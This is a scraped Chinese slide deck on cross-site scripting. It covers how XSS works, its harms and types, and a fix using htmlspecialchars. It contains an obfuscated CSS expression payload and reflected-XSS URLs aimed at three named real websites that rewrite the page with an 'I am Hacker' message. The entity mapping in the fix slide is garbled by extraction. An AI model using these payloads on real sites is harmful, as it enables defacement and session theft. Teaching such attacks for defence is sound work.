Mais conteúdo relacionado
Semelhante a Telligem 1_xss (20)
Telligem 1_xss
- 3. 跨站 脚本 漏洞原理及其危害 Cross site scripting 简称 XSS 原理: 利用网站的漏洞向网站的页面注入 JAVASCRIPT 等脚本内容。 根源:程序的输入、输出没有考虑安全因素。
- 4. XSS Cheat Sheet http://ha.ckers.org/xss.html 了解不同浏览器和各种特殊的 HTML 标签如何执行脚本。 XSS 需要使用的关键字 ‘ ‘ ; ! -- “ <XSS> = & { ( ) } 各类伪协议头: Javascript: vbscript: 跨站 脚本 漏洞原理及其危害
- 5. CSS 样式表脚本注入 style=xss:expression(eval(String.fromCharCode(105,102,40,119,105,110,100,111,119,46, 120,33,61,34,49,34,41,123,97,108,101,114,116,40,34,120,115,115,34,41,59,119,105,110,100,111,119,46,120,61,34,49,34,59,125))) expression 变形。 跨站 脚本 漏洞原理及其危害
- 6. 挂马 插入恶意的脚本内容,运行病毒、木马。 钓鱼 篡改网页内容,骗取账号、密码等诈骗行为。 劫持会话 读取会话 COOKIE, 传送给第三方劫持身份。 XSS Worm 使用 AJAX 技术,做几何趋势的增长传播。 跨站 脚本 漏洞的危害
- 7. 非持久型 XSS 需要从 URL 传参,点击链接触发。 持久型 XSS XSS 内容已存储到数据库,写到固定页面。 DOM XSS JAVASCRIPT 处理数据输出出现漏洞。 浏览器的漏洞造成的 XSS 跨站脚本漏洞分类
- 9. http://tiaozhan.ecjtu.net/search.asp?key=<script>window.onload=function(){document.body.innerHTML=eval(String.fromCharCode(34,60,104,49,32,115,116,121,108,101,61,39,102,111,110,116,45,115,105,122,101,58,49,48,48,112,120,39,62,73,32,97,109,32,72,97,99,107,101,114,32,24464,27743,28059,60,47,104,49,62,34))}</script> 跨站脚本漏洞及案例 搜索 http://es.babydao.com/index.php?app=storelist&cate_id=0&keywords=%22%3E%3Cscript%3Ewindow.onload=function(){document.body.innerHTML=eval(String.fromCharCode(34,60,112,49,32,115,116,121,108,101,61,39,102,111,110,116,45,115,105,122,101,58,49,48,48,112,120,39,62,73,32,97,109,32,72,97,99,107,101,114,32,24464,27743,28059,60,47,112,49,62,34))}%3C/script%3E%3C http://www.nengcha.com/code/unicode/?key=%3Cscript%3Ewindow.onload=function(){document.body.innerHTML=eval(String.fromCharCode(34,60,112,49,32,115,116,121,108,101,61,39,102,111,110,116,45,115,105,122,101,58,49,48,48,112,120,39,62,73,32,97,109,32,72,97,99,107,101,114,32,24464,27743,28059,60,47,112,49,62,34))}%3C/script%3E
- 10. 跨站脚本漏洞修补建议 使用 htmlspecialchars 打开引号参数 htmlspecialchars ( $xss, ENT_QUOTES ) & ==> & " ==> " ' ==> ' // 需要打开引号参数 < ==> < > ==> >